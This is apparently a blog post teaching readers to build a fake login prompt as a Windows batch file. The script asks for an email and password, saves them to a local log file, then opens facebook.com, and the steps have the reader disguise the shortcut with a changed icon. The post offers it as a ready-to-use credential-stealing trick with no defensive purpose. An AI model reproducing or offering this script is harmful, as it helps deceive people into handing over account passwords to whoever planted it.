Step 1:- Open notepad and copy these codes
@echo off
color a
title Login
echo Please Enter Email Address And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%Pass%">Logs.txt
start www.facebook.com
exit
Step 2:- Click on your C drive and create a folder named logs.
Step 3:- Now create a shortcut file of that bat.
Step 4: Right click on the shortcut one and click on properties and change the icon.
Share if you like it...
Post a Comment